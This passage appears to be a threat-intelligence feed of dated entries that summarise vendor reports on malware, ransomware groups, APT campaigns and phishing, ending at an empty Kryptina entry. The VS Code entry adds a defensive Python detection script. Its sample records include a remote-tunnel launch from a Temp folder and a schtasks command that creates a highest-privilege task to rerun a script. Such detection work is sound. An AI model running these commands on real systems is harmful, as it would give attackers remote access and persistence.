2024-10-03
Diving_Deep_into_Amnesia_Stealer
LOW
+
Intel Source:
ThreatMon
Intel Name:
Diving_Deep_into_Amnesia_Stealer
Date of Scan:
2024-10-03
Impact:
LOW
Summary:
ThreatMon researchers have published a detailed technical analysis of the Amnesia Stealer malware, an open-source stealer that is also offered as Malware-as-a-Service (MaaS) on underground forums. It provides a user-friendly interface for data theft and system control, and uses Discord and Telegram for command and control. The malware can steal browser passwords, cryptocurrency wallets and Wi-Fi credentials, includes keylogging and clipboard hijacking, can bypass Windows Defender, and can deploy additional payloads such as trojans and miners.
Source: https://45734016.fs1.hubspotusercontent-na1.net/hubfs/45734016/AMNESIA%20STEALER%20REPORT.pdf?__hstc=205617164.4ca88179e9c4de00be257a0ec5f4dee7.1721037753230.1726138178169.1727940935391.10&__hssc=205617164.1.1727940935391&__hsfp=2296146515
2024-10-03
A_Deep_Dive_into_Akira_Ransomware
MEDIUM
+
Intel Source:
Qualys
Intel Name:
A_Deep_Dive_into_Akira_Ransomware
Date of Scan:
2024-10-03
Impact:
MEDIUM
Summary:
Researchers from Qualys have profiled the Akira ransomware group, active since 2023 and targeting multiple industries, primarily in North America, the UK and Australia. Akira operates as Ransomware-as-a-Service (RaaS) and uses double extortion: it steals data as well as encrypting files. The group gains access through stolen credentials or vulnerabilities and uses tools such as Mimikatz and AdFind to dump credentials, maintain access and bypass defenses. Akira uses the ChaCha encryption algorithm, and victims communicate with the attackers via a TOR site.
Source: https://blog.qualys.com/vulnerabilities-threat-research/2024/10/02/threat-brief-understanding-akira-ransomware#indicators-of-compromise
2024-10-03
SHROUDED_SLEEP_Campaign
MEDIUM
+
Intel Source:
Securonix Threat Labs
Intel Name:
SHROUDED_SLEEP_Campaign
Date of Scan:
2024-10-03
Impact:
MEDIUM
Summary:
Researchers from Securonix have uncovered a campaign called SHROUDED#SLEEP, run by the North Korean threat actor APT37 (also known as Reaper or Group123). The actor targets countries in Southeast Asia, with a primary focus on Cambodia. The attack begins with a phishing email carrying malicious documents, such as PDF or Excel files, that conceal a PowerShell backdoor called VeilShell, which gives the attackers full control over the victim's machine. VeilShell lets the attacker exfiltrate files, modify system settings, create scheduled tasks and manipulate the Windows registry.
Source: https://www.securonix.com/blog/shroudedsleep-a-deep-dive-into-north-koreas-ongoing-campaign-against-southeast-asia/
2024-10-02
CeranaKeeper_Threat_Actor
MEDIUM
+
Intel Source:
ESET
Intel Name:
CeranaKeeper_Threat_Actor
Date of Scan:
2024-10-02
Impact:
MEDIUM
Summary:
ESET researchers have identified a new China-aligned cyber threat actor, dubbed CeranaKeeper, which has been actively targeting governmental institutions in Thailand since at least early 2022. This group employs a sophisticated array of custom tools for data exfiltration, utilizing legitimate cloud services like Dropbox, OneDrive, and GitHub to evade detection. CeranaKeeper's operations demonstrate significant creativity and adaptability, as they leverage previously undocumented methods to gain access to networks and extract sensitive information.
Source: https://www.welivesecurity.com/en/eset-research/separating-bee-panda-ceranakeeper-making-beeline-thailand/
2024-10-02
September_Malspam_Campaigns
LOW
+
Intel Source:
Github (silence-is-best)
Intel Name:
September_Malspam_Campaigns
Date of Scan:
2024-10-02
Impact:
LOW
Summary:
Aggregation of September malspam campaign details shared by researcher silence-is-best
Source: https://gist.github.com/silence-is-best/2efe46038a58d20e173fb5ca0a3f7f43
2024-10-02
Stonefly_Group
MEDIUM
+
Intel Source:
Symantec
Intel Name:
Stonefly_Group
Date of Scan:
2024-10-02
Impact:
MEDIUM
Summary:
Symantec’s Threat Hunter Team has uncovered ongoing financially motivated attacks by the North Korean cyber group Stonefly against U.S. organizations, despite an indictment and a significant reward for information on one of its members. In August 2024, Stonefly attempted to infiltrate three U.S. private companies, deploying their custom malware Backdoor.Preft among other tools, although they did not succeed in launching ransomware. The group's tactics include using a mix of previously known and newly obtained tools, such as the credential dumping tool Mimikatz and various keyloggers, to harvest sensitive data.
Source: https://symantec-enterprise-blogs.security.com/threat-intelligence/stonefly-north-korea-extortion
2024-10-02
WarmCookie_Backdoor_Update
MEDIUM
+
Intel Source:
Gen Threat Labs
Intel Name:
WarmCookie_Backdoor_Update
Date of Scan:
2024-10-02
Impact:
MEDIUM
Summary:
A new FakeUpdate campaign by the threat group SocGholish is targeting users in France with fake browser and application update prompts that deliver an updated version of the WarmCookie backdoor. Disguised as updates for Google Chrome, Mozilla Firefox, Microsoft Edge and Java, the prompts appear on compromised websites and install malware instead of a legitimate update when clicked. WarmCookie, first identified in 2023, has expanded its capabilities to include data theft, command execution and delivery of additional malware; the latest version adds features such as loading DLLs and executing EXE or PowerShell files.
Source: https://x.com/GenThreatLabs/status/1840762181668741130
2024-10-01
Gorilla_Botnet
LOW
+
Intel Source:
NSFocus
Intel Name:
Gorilla_Botnet
Date of Scan:
2024-10-01
Impact:
LOW
Summary:
Researchers from NSFocus have identified Gorilla Botnet, a new botnet derived from Mirai, which has targeted over 100 countries, with the U.S. and China the most affected. It targets sectors including universities, government websites, telecoms, banks, gaming and gambling. The botnet supports multiple CPU architectures, including ARM, MIPS and x86, uses five C&C servers, and can launch 19 different types of DDoS attack.
Source: https://nsfocusglobal.com/over-300000-gorillabot-the-new-king-of-ddos-attacks/
2024-10-01
Mitigating_More_Eggs_Backdoor_Using_MDR_Solutions
LOW
+
Intel Source:
Trend Micro
Intel Name:
Mitigating_More_Eggs_Backdoor_Using_MDR_Solutions
Date of Scan:
2024-10-01
Impact:
LOW
Summary:
Researchers from Trend Micro have reported that its MDR team used the Vision One platform to protect against a more_eggs backdoor infection. This attack began when a recruitment officer downloaded a malicious file masquerading as a resume, which triggered the execution of the more_eggs malware. The MDR team immediately discovered the infected endpoint, blocked Indicators of Compromise (IOCs), and automated the response with custom filters and the Security Playbook, resulting in effective threat containment.
Source: https://www.trendmicro.com/en_us/research/24/i/mdr-in-action--preventing-the-moreeggs-backdoor-from-hatching--.html
2024-10-01
Swiss_Army_Suite_Tool_for_Vulnerability_Scanning
LOW
+
Intel Source:
Palo Alto
Intel Name:
Swiss_Army_Suite_Tool_for_Vulnerability_Scanning
Date of Scan:
2024-10-01
Impact:
LOW
Summary:
Researchers at Palo Alto Networks have discovered an automated scanning tool called Swiss Army Suite that attackers use to scan websites for vulnerabilities, chiefly SQL injection flaws that allow a database to be manipulated through injected queries. The tool can scan large numbers of websites, includes a Dork Checker that uses search-engine queries to locate exposed sensitive information, and offers a vulnerability scanner and a proxy checker. It is available on underground forums.
Source: https://unit42.paloaltonetworks.com/machine-learning-new-swiss-army-suite-tool/
2024-10-01
Fortinet_Firewall_Exploited_in_Attack
LOW
+
Intel Source:
ReliaQuest
Intel Name:
Fortinet_Firewall_Exploited_in_Attack
Date of Scan:
2024-10-01
Impact:
LOW
Summary:
Researchers from ReliaQuest have analysed a data exfiltration attack from July 2024 against a customer in the manufacturing sector. The threat actors gained access through a Fortinet firewall and brute-forced a privileged service account, which allowed them to exfiltrate sensitive data from several file servers using tools such as Secure Copy Protocol (SCP). The ReliaQuest Threat Hunting team responded quickly, using GreyMatter Response Playbooks to isolate affected hosts and reset compromised accounts. The incident highlights the need for sound patch management on perimeter devices, comprehensive endpoint detection and response (EDR), and strong host-based policies to mitigate future threats.
Source: https://www.reliaquest.com/blog/data-exfiltration-attack-analysis-manufacturing-sector-breach/
2024-10-01
Keygroup777_Ransomware_Group
MEDIUM
+
Intel Source:
Securelist
Intel Name:
Keygroup777_Ransomware_Group
Date of Scan:
2024-10-01
Impact:
MEDIUM
Summary:
Researchers at Securelist have profiled a ransomware group called Keygroup777, a financially motivated group that primarily targets Russian users. The group has been active since 2022 and uses various ransomware builders, including Xorist, Chaos, Annabelle, Slam, RuRansom, UX-Cryptor and Hakuna Matata. Its ransom notes are typically written in both Russian and English and give contact details for negotiation through Telegram. The group disables security features on victims' systems and modifies registry keys to maintain persistence. Its activity reflects a mix of financial and ideological motives, and it leaves digital footprints on platforms such as GitHub and Telegram.
Source: https://securelist.com/key-group-ransomware-samples-and-telegram-schemes/114025/
2024-10-01
Exposing_Transparent_Tribes_Attack_Tactics
MEDIUM
+
Intel Source:
Cyfirma
Intel Name:
Exposing_Transparent_Tribes_Attack_Tactics
Date of Scan:
2024-10-01
Impact:
MEDIUM
Summary:
Researchers at CYFIRMA have found 15 malicious C2 servers linked to the APT group Transparent Tribe (APT36), hosted on DigitalOcean and running the Mythic C2 framework. The group was seen using Linux desktop entry files disguised as PDFs to deliver malicious binaries, particularly to victims in India. The campaign shows an increased emphasis on Linux environments, particularly in Indian government sectors that use the Debian-based BOSS OS and the recently announced Maya OS.
Source: https://www.cyfirma.com/research/osint-investigation-hunting-malicious-infrastructure-linked-to-transparent-tribe/
2024-10-01
Unauthorized_Access_through_Visual_Studio_Code
LOW
+
Intel Source:
Cyble
Intel Name:
Unauthorized_Access_through_Visual_Studio_Code
Date of Scan:
2024-10-01
Impact:
LOW
Summary:
Researchers from CRIL have identified an attack in which threat actors abuse the legitimate Visual Studio Code (VS Code) tooling. The attack begins with an LNK file delivered via spam email. Once executed, it downloads a Python package that runs a malicious script. The attackers then use VS Code to create a remote tunnel, which gives them unauthorized remote access to the victim's machine: they can browse the system, manipulate files, execute commands and potentially install additional malware. The attacker also sets up a scheduled task that automatically reruns the malicious script with high system privileges.
Source: https://cyble.com/blog/silent-intrusion-unraveling-the-sophisticated-attack-leveraging-vs-code-for-unauthorized-access/
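Two steps of the chain above leave telemetry a defender can key on: the VS Code CLI being started with the tunnel subcommand from an odd parent or location, and schtasks being used to create a task at the highest run level that invokes a script host. The rules below are an added example written for this entry, not code from Cyble or from the feed. The process-creation records are constructed; the path layout, the suspicious-location patterns and the tag names are assumptions, and the rules assume the tunnel is started through the code CLI's tunnel subcommand.

```python
import ntpath
import re

# Constructed process-creation records (parent image, image, command line); not real telemetry.
SAMPLE_EVENTS = [
    {   # a developer opening a project normally
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Users\alice\AppData\Local\Programs\Microsoft VS Code\Code.exe",
        "cmdline": r'"C:\Users\alice\AppData\Local\Programs\Microsoft VS Code\Code.exe" C:\src\project',
    },
    {   # a CLI dropped in Temp, launched by a script, starting a remote tunnel
        "parent": r"C:\Users\bob\AppData\Local\Temp\python\python.exe",
        "image": r"C:\Users\bob\AppData\Local\Temp\code.exe",
        "cmdline": r"C:\Users\bob\AppData\Local\Temp\code.exe tunnel --accept-server-license-terms",
    },
    {   # a scheduled task created to rerun the script with the highest run level
        "parent": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\schtasks.exe",
        "cmdline": r'schtasks /create /tn "Updater" /tr "python.exe C:\Users\bob\AppData\Local\Temp\update.py" /sc minute /mo 5 /rl highest /f',
    },
    {   # an administrator querying an existing task
        "parent": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\schtasks.exe",
        "cmdline": r'schtasks /query /tn "Backup"',
    },
]

SCRIPT_HOSTS = {"python.exe", "pythonw.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
# Assumed user-writable drop locations; extend to match the environment.
USER_WRITABLE = re.compile(r"\\appdata\\local\\temp\\|\\downloads\\|\\public\\", re.IGNORECASE)
TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def split_cmdline(cmdline):
    """Tokenise a Windows command line, honouring double-quoted arguments."""
    return [quoted or bare for quoted, bare in TOKEN.findall(cmdline)]


def _arg_after(tokens, flag):
    """Value following a flag such as /rl, or None if the flag is absent or dangling."""
    if flag in tokens:
        i = tokens.index(flag)
        if i + 1 < len(tokens):
            return tokens[i + 1]
    return None


def classify(event):
    """Return the detection tags that apply to one process-creation record."""
    tags = []
    image = ntpath.basename(event["image"]).lower()
    parent = ntpath.basename(event["parent"]).lower()
    lowered = [t.lower() for t in split_cmdline(event["cmdline"])]

    # Rule 1: the VS Code CLI started with the tunnel subcommand.
    if image == "code.exe" and len(lowered) > 1 and lowered[1] == "tunnel":
        tags.append("vscode_tunnel")
        # A tunnel started by a script host, or from a user-writable path, is the
        # pattern in this chain; a developer starts it from an installed binary.
        if parent in SCRIPT_HOSTS or USER_WRITABLE.search(event["image"]):
            tags.append("suspicious_origin")

    # Rule 2: schtasks creating a task at the highest run level that invokes a script host.
    if image == "schtasks.exe" and "/create" in lowered:
        if _arg_after(lowered, "/rl") == "highest":
            tags.append("schtasks_highest_privilege")
        task_cmd = _arg_after(lowered, "/tr") or ""
        if any(host in task_cmd for host in SCRIPT_HOSTS):
            tags.append("schtasks_runs_script_host")
    return tags


def scan_events(events):
    """Tags per event, in input order."""
    return [classify(e) for e in events]


if __name__ == "__main__":
    for event, tags in zip(SAMPLE_EVENTS, scan_events(SAMPLE_EVENTS)):
        print(tags or ["-"], event["cmdline"])
```

Either tag on its own is noisy in an environment with many developers; the combination of a tunnel from a user-writable path and a highest-privilege task invoking a script host on the same machine within a short window is what merits an alert.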
2024-09-30
Iranian_Threat_Actors_Targeting_Personal_Accounts
MEDIUM
+
Intel Source:
IC3 GOV
Intel Name:
Iranian_Threat_Actors_Targeting_Personal_Accounts
Date of Scan:
2024-09-30
Impact:
MEDIUM
Summary:
A joint advisory has been issued by the FBI, U.S. Cyber Command, the Treasury Department and the UK's NCSC about activity linked to Iranian threat actors. These actors work on behalf of the IRGC and target individuals involved in Middle Eastern and Iranian affairs, such as government officials, think-tank staff, journalists, activists and lobbyists. The FBI has also observed them targeting people associated with U.S. political campaigns. The attackers use social-engineering tactics, such as impersonating known contacts or email providers, to trick victims into giving up sensitive information such as login credentials. Once successful, they take over the accounts, set up email forwarding, delete messages and connect unknown devices to the victim's account.
Source: https://www.ic3.gov/Media/News/2024/240927.pdf
2024-09-30
New_Version_of_XWorm_Tool
LOW
+
Intel Source:
Netskope
Intel Name:
New_Version_of_XWorm_Tool
Date of Scan:
2024-09-30
Impact:
LOW
Summary:
Netskope researchers have identified a new version of XWorm. The tool first appeared in 2022 and is capable of stealing sensitive information, providing remote access and deploying other malware; NullBulge and TA558 have both used XWorm in attacks. The infection begins with a Windows Script File (WSF) delivered through phishing, which tricks users into downloading and running a PowerShell script hosted on the legitimate paste site Paste.ee. The new version adds commands for removing plugins, monitoring its network response time, modifying the system's hosts file, launching DDoS attacks and taking screenshots of the victim's computer.
Source: https://www.netskope.com/blog/netskope-threat-labs-uncovers-new-xworms-stealthy-techniques
2024-09-30
Nitrogen_Malware_Campaign
MEDIUM
+
Intel Source:
The DFIR Reports
Intel Name:
Nitrogen_Malware_Campaign
Date of Scan:
2024-09-30
Impact:
MEDIUM
Summary:
The DFIR Report researchers have documented an intrusion that began when a user downloaded a malicious version of an IP Scanner tool from a fake website promoted through Google ads. The download was part of a Nitrogen malware campaign. The attackers used legitimate Python components to deploy the malware, then deployed the Sliver framework for remote access. They used the open-source backup tool Restic to copy data from file shares to a remote server, explored the network with native Windows tools, and deployed Cobalt Strike to steal credentials. After obtaining admin access, the attacker deployed BlackCat ransomware across the network to encrypt files on the affected machines.
Source: https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/
2024-09-30
8220_Gang_Exploits_WebLogic_with_Hadooken
LOW
+
Intel Source:
Sekoia
Intel Name:
8220_Gang_Exploits_WebLogic_with_Hadooken
Date of Scan:
2024-09-30
Impact:
LOW
Summary:
Researchers from Sekoia have discovered an infection chain that targets both Windows and Linux computers via Oracle WebLogic vulnerabilities and deploys the K4Spreader malware, which delivers the Tsunami backdoor and a cryptominer. Similarly, AquaSec revealed that the Hadooken malware was infecting WebLogic systems via a configuration vulnerability. The 8220 Gang, a China-based group known for compromising cloud environments to mine Monero, is responsible for both instances, which share tactics, techniques and Monero wallets.
Source: https://blog.sekoia.io/hadooken-and-k4spreader-the-8220-gangs-latest-arsenal/
2024-09-27
Linux_Malware_Campaign_Exploits_Servers_and_APIs
MEDIUM
+
Intel Source:
Elastic Security Labs
Intel Name:
Linux_Malware_Campaign_Exploits_Servers_and_APIs
Date of Scan:
2024-09-27
Impact:
MEDIUM
Summary:
Researchers at Elastic Security Labs have discovered the REF6138 campaign, a Linux malware operation that has been infecting an Apache2 server since March 2024. The attackers used KAIJI for DDoS attacks and RUDEDEVIL for cryptomining, with C2 channels masquerading as kernel processes, Telegram bots for communication, and cron jobs for task execution. The effort most likely includes money laundering through Bitcoin/XMR mining using casino APIs, as daily uploads of new KAIJI samples indicate active development.
Source: https://www.elastic.co/security-labs/betting-on-bots
2024-09-27
Rhadamanthys_Stealer_Adds_AI_Feature
LOW
+
Intel Source:
Recorded Future
Intel Name:
Rhadamanthys_Stealer_Adds_AI_Feature
Date of Scan:
2024-09-27
Impact:
LOW
Summary:
Researchers from Insikt Group have observed the information-stealing malware named Rhadamanthys, which first emerged in 2022. It is sold on a subscription model at $250 for 30 days. It is capable of stealing data such as system information, passwords, cryptocurrency wallets and browser data. This stealer has been updated to version 0.7.0 with new features such as using AI to extract cryptocurrency seed phrases from images and installing Microsoft Software Installer (MSI) files that can avoid detection by traditional security systems.
Source: https://go.recordedfuture.com/hubfs/reports/mtp-2024-0926.pdf
2024-09-27
Gamaredon_Cyber_Operations_During_Ukraine_Crisis
LOW
+
Intel Source:
ESET
Intel Name:
Gamaredon_Cyber_Operations_During_Ukraine_Crisis
Date of Scan:
2024-09-27
Impact:
LOW
Summary:
Researchers at ESET have investigated Gamaredon's cyberespionage tools used against Ukraine in 2022 and 2023. Despite Russia's stepped-up invasion since February 2022, Gamaredon, a Russia-aligned APT active since 2013, has continually targeted Ukrainian entities with the same level of cyberactivity. According to ESET's findings, Gamaredon has taken a deliberate approach to its attacks, demonstrating its continued interest in espionage in the region throughout the continuing conflict.
Source: https://www.welivesecurity.com/en/eset-research/cyberespionage-gamaredon-way-analysis-toolset-used-spy-ukraine-2022-2023/
2024-09-27
DCRat_Targets_Users_with_HTML_Smuggling
LOW
+
Intel Source:
Netskope
Intel Name:
DCRat_Targets_Users_with_HTML_Smuggling
Date of Scan:
2024-09-27
Impact:
LOW
Summary:
Netskope researchers have identified a malware called DCRat, also known as Dark Crystal, which has been active since 2018 and is sold as malware-as-a-service (MaaS). This malware is written in C# and has capabilities such as executing commands, logging keystrokes, and stealing files and credentials. Researchers also found that DCRat is now being distributed using a new technique called HTML smuggling that specifically targets Russian-speaking users. HTML smuggling hides malicious code in an HTML file, which can bypass security checks and get downloaded through the victim’s web browser. The malware is concealed as fake versions of popular Russian apps like TrueConf and VK Messenger.
Source: https://www.netskope.com/blog/dcrat-targets-users-with-html-smuggling
2024-09-26
Phishing_Service_Using_Proxies_to_Evade_Detection
LOW
+
Intel Source:
Palo Alto
Intel Name:
Phishing_Service_Using_Proxies_to_Evade_Detection
Date of Scan:
2024-09-26
Impact:
LOW
Summary:
Researchers at Palo Alto have identified the Sniper Dz phishing-as-a-service (PhaaS) platform, which targets social media platforms and online services and has been linked to over 140,000 phishing websites in the last year. Sniper Dz offers free templates and hosting to phishers, which are paid for with stolen credentials. To avoid detection, it hides phishing information behind public proxies and frequently utilizes genuine SaaS hosting platforms. Phishers utilize well-known brand names and trends to entice victims, and hijacked websites may route them to malicious adverts or unwanted programs.
Source: https://unit42.paloaltonetworks.com/phishing-platform-sniper-dz-unique-tactics/
2024-09-26
Cloud_Services_Exploited_in_Asia
LOW
+
Intel Source:
Cloudflare
Intel Name:
Cloud_Services_Exploited_in_Asia
Date of Scan:
2024-09-26
Impact:
LOW
Summary:
Researchers from Cloudflare have discovered SloppyLemming, a threat actor targeting South and East Asia who uses cloud providers for credential harvesting, malware delivery, and C2 activities. It has been active since late 2022 and primarily targets the government, defense, and technological sectors of Pakistan, Bangladesh, Sri Lanka, Nepal, and China. SloppyLemming's inadequate OPSEC revealed the employment of Cobalt Strike and Havoc, as well as the alignment with CrowdStrike's OUTRIDER TIGER.
Source: https://www.cloudflare.com/en-in/threat-intelligence/research/report/unraveling-sloppylemmings-operations-across-south-asia/
2024-09-26
Patchwork_Targeting_Chinese_and_Bhutan_Entities
LOW
+
Intel Source:
Cyble
Intel Name:
Patchwork_Targeting_Chinese_and_Bhutan_Entities
Date of Scan:
2024-09-26
Impact:
LOW
Summary:
Cyble researchers have identified a campaign in which an APT group called Patchwork, also known as Dropping Elephant, is targeting China and Bhutan. This group has been active since 2009 and primarily focuses on government, defense and diplomatic organizations across South and Southeast Asia. The attackers lure victims into downloading malicious LNK files disguised as a Chinese aerospace event and the Bhutan Adaptation Fund Board. Once a user clicks these files, they download a malicious PDF and a DLL file. This DLL decrypts and runs the final payload in system memory, allowing the malware to gather sensitive information such as process IDs, IP addresses and usernames and send the data to an attacker-controlled C2 server for further malicious actions.
Source: https://cyble.com/blog/nexe-backdoor-unleashed-patchwork-apt-groups-sophisticated-evasion-of-defenses/
2024-09-26
KLogEXE_and_FPSpy_Found_in_Latest_Threat_Campaign
MEDIUM
+
Intel Source:
Palo Alto
Intel Name:
KLogEXE_and_FPSpy_Found_in_Latest_Threat_Campaign
Date of Scan:
2024-09-26
Impact:
MEDIUM
Summary:
Researchers from Palo Alto have identified two new malware variants used by the Sparkling Pisces (aka Kimsuky) group: KLogEXE, an undocumented keylogger, and FPSpy, a backdoor variant. These enhancements expand Sparkling Pisces' already advanced toolkit while demonstrating their continual progress. The FPSpy variation is believed to be tied to a 2022 campaign aimed against a South Korean technological business. The analysis of these malware samples revealed sophisticated capabilities such as keylogging, data exfiltration, and command execution.
Source: https://unit42.paloaltonetworks.com/kimsuky-new-keylogger-backdoor-variant/
2024-09-26
Storm_0501_Target_Cloud_Environment
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
Storm_0501_Target_Cloud_Environment
Date of Scan:
2024-09-26
Impact:
MEDIUM
Summary:
Microsoft researchers have identified a financially motivated threat actor known as Storm-0501 that has been active since 2021. The group initially targeted U.S. schools with ransomware to extort money but later moved to a ransomware-as-a-service (RaaS) model, collaborating with other cybercriminals to distribute various ransomware strains. Recently this group has begun its attacks by compromising hybrid cloud environments and then moving from on-premises networks to cloud systems, leading to data exfiltration, credential theft, system tampering, backdoor access and ransomware deployment. These attacks have targeted multiple sectors across the United States such as government, manufacturing, transportation and law enforcement.
Source: https://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/
2024-09-26
A_Deep_Dive_into_SloppyLemming
LOW
+
Intel Source:
Cloudflare
Intel Name:
A_Deep_Dive_into_SloppyLemming
Date of Scan:
2024-09-26
Impact:
LOW
Summary:
Researchers at Cloudflare have discovered a cyber espionage group named SloppyLemming that has been active since 2022. This group targets entities such as government, law enforcement, energy, telecommunications and technology in South and East Asia, including Pakistan, Sri Lanka, Bangladesh and China. They often use phishing tactics and custom-built tools like "CloudPhish" to create fake login portals and exfiltrate credentials through services like Discord. SloppyLemming has been observed using Google OAuth token theft to gain access to Gmail accounts and deploying malware through infected files hosted on services like Dropbox.
Source: https://blog.cloudflare.com/unraveling-sloppylemming-operations/
2024-09-25
HTML_Smuggling
LOW
+
Intel Source:
Trustwave
Intel Name:
HTML_Smuggling
Date of Scan:
2024-09-25
Impact:
LOW
Summary:
Trustwave researchers have identified HTML smuggling, in which cybercriminals use JavaScript code in phishing emails or websites to create malicious files on a victim’s computer instead of downloading them from a remote server. In a recent phishing campaign, attackers impersonated brands like American Express, DocuSign and Microsoft by sending emails with links that eventually led to a phishing page. The phishing page is encoded in JavaScript and turned into a Blob URL. When the user opens this URL, it appears to be a legitimate American Express page, but it is actually a phishing scam.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/html-smuggling-how-blob-urls-are-abused-to-deliver-phishing-content/
2024-09-25
Multiple_Malware_Targeting_Transport_and_Logistics
LOW
+
Intel Source:
Proofpoint
Intel Name:
Multiple_Malware_Targeting_Transport_and_Logistics
Date of Scan:
2024-09-25
Impact:
LOW
Summary:
Proofpoint researchers have identified a campaign in which transportation and logistics companies in North America are being targeted to spread various types of malware. The attackers use compromised email accounts from legitimate companies to send malicious content within ongoing email conversations. Initially, they delivered malware such as Lumma Stealer, StealC and NetSupport, but they have since added DanaBot and Arechclient2. The attackers are using a new tactic called “ClickFix” in which users are tricked into running a PowerShell script to install malware. The attackers also appear to research their targets, tailoring their messages to look legitimate within the transport and logistics sector.
Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-actor-uses-compromised-accounts-customized-social-engineering
2024-09-25
BlackJack_and_Twelve_Hacktivists_Linked
LOW
+
Intel Source:
Securelist
Intel Name:
BlackJack_and_Twelve_Hacktivists_Linked
Date of Scan:
2024-09-25
Impact:
LOW
Summary:
Researchers at Securelist have found connections between two hacktivist groups, BlackJack and Twelve, while researching attacks on Russian organizations. Both groups utilize identical strategies, techniques, and malware to target the Russian government and industrial sector. Though it's unclear whether the same people are responsible for both, they appear to be part of a single cluster dedicated to causing damage by encrypting, destroying, and stealing data, rather than financial gain.
Source: https://securelist.com/blackjack-hacktivists-connection-with-twelve/113959/
2024-09-25
Rilide_Malware_Targeting_Credentials_and_Wallets
LOW
+
Intel Source:
Medium (Walmart)
Intel Name:
Rilide_Malware_Targeting_Credentials_and_Wallets
Date of Scan:
2024-09-25
Impact:
LOW
Summary:
Researchers at Walmart have detected Rilide, formerly known as CookieGenesis, a malicious browser extension capable of credential harvesting, cookie stealing, system information collection, and webinject attacks. It can also capture screenshots, locate files and wallets, and adjust balances on services such as Facebook, Coinbase, and Google Pay. Rilide utilizes several C2 traffic mechanisms, including Telegram and blockchain transaction decoding. One group was found using a distinct C2 structure and distributing the malware via a pay-per-install (PPI) service.
Source: https://medium.com/walmartglobaltech/diving-into-rilide-02684e540b48
2024-09-25
TikTok_Links_Hijack_Microsoft_Accounts
LOW
+
Intel Source:
Cofense
Intel Name:
TikTok_Links_Hijack_Microsoft_Accounts
Date of Scan:
2024-09-25
Impact:
LOW
Summary:
Cofense researchers have uncovered a phishing campaign that uses TikTok URLs to trick users into giving away their Microsoft Office 365 credentials. The phishing emails pretend to be from the user’s IT department, claiming that emails will be deleted if immediate action is not taken. The emails contain TikTok URLs that redirect users to a fake Microsoft login page designed to steal their credentials. The phishing page even auto-fills the user’s email to make the scam more legitimate.
Source: https://cofense.com/blog/exploiting-social-media-tiktok-links-used-to-hijack-microsoft-accounts
2024-09-24
Compromised_Routers_Linked_to_Chinese_Botnet
HIGH
+
Intel Source:
IC3 GOV
Intel Name:
Compromised_Routers_Linked_to_Chinese_Botnet
Date of Scan:
2024-09-24
Impact:
HIGH
Summary:
U.S. agencies, including the FBI, CNMF, and NSA, have determined that cyber actors linked to the People's Republic of China (PRC) have gained access to thousands of Internet-connected devices, including SOHO routers, firewalls, NAS, and IoT devices, building a huge botnet for illegal operations. The botnet, which is run by the PRC-based Integrity Technology Group, has been active since mid-2021 and, as of June 2024, had over 260,000 compromised devices globally. These devices are used to perform DDoS attacks and to compromise targeted US networks.
Source: https://www.ic3.gov/Media/News/2024/240918.pdf
2024-09-24
Russian_Threat_Actor_Targeting_US_Election
LOW
+
Intel Source:
Silentpush
Intel Name:
Russian_Threat_Actor_Targeting_US_Election
Date of Scan:
2024-09-24
Impact:
LOW
Summary:
Silentpush researchers have discovered a campaign linked to a Russian threat actor that is actively running crypto scams targeting the U.S. Presidential Election and major U.S. tech brands. These scams involve fake promotions that claim to double Bitcoin and Ethereum if victims send cryptocurrency to a wallet controlled by the attackers. The attackers have set up websites featuring well-known figures like Donald Trump, Kamala Harris, Elon Musk and Tim Cook, as well as fake legal documents from U.S. government agencies, to make the scam seem legitimate.
Source: https://www.silentpush.com/blog/us-political-crypto-scams/
2024-09-24
Threat_Actor_Targets_Docker_and_Kubernetes
LOW
+
Intel Source:
Datadog Security Labs
Intel Name:
Threat_Actor_Targets_Docker_and_Kubernetes
Date of Scan:
2024-09-24
Impact:
LOW
Summary:
Datadog researchers have discovered a malware campaign targeting technologies like Docker and Kubernetes. The attackers exploit vulnerabilities in Docker systems to gain access and install a cryptocurrency miner on compromised containers. Their tools specifically target the Kubernetes kubelet API, which manages containers, allowing the attackers to take control and spread more malware. They also used Docker Hub, a public container registry, to distribute their malicious software, with the account "nmlmweb3" linked to this campaign. Additionally, more malware samples were identified in an open directory on their C2 server, showing their focus on targeting Docker Swarm, another platform for managing containers.
Source: https://securitylabs.datadoghq.com/articles/threat-actors-leveraging-docker-swarm-kubernetes-mine-cryptocurrency/
2024-09-24
SnipBot_Malware_Targets_IT_and_Legal_Sectors
MEDIUM
+
Intel Source:
Palo Alto
Intel Name:
SnipBot_Malware_Targets_IT_and_Legal_Sectors
Date of Scan:
2024-09-24
Impact:
MEDIUM
Summary:
Researchers from Palo Alto Networks have found SnipBot, a new version of the RomCom malware that uses unique code obfuscation and anti-analysis methods. This malware was discovered in early 2024, with origins tracing back to December 2023. SnipBot lets attackers run commands and download new modules onto a victim's computer. It expands on previous RomCom versions (3.0 and 4.0) and may be focused on espionage rather than financial gain.
Source: https://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/
2024-09-23
UNC5267_Campaign
MEDIUM
+
Intel Source:
Mandiant
Intel Name:
UNC5267_Campaign
Date of Scan:
2024-09-23
Impact:
MEDIUM
Summary:
Mandiant researchers have uncovered an operation called UNC5267 in which North Korean IT workers are sent abroad, primarily to China and Russia, with smaller groups in Africa and Southeast Asia. These workers are deployed by the North Korean government to secure remote jobs, often in Western tech companies and particularly in the U.S. tech sector, for financial gain and long-term access to networks. These workers use fake resumes and online profiles to get hired, then connect to company laptops remotely via tools like AnyDesk or TeamViewer and hide their true locations using VPNs.
Source: https://cloud.google.com/blog/topics/threat-intelligence/mitigating-dprk-it-worker-threat/
2024-09-23
Kryptina_RaaS_Updates
LOW
+
Intel Source:
SentinelOne
Intel Name:
Kryptina_RaaS_Updates
Date of Scan:
2024-09-23
Impact:
LOW
Summary:
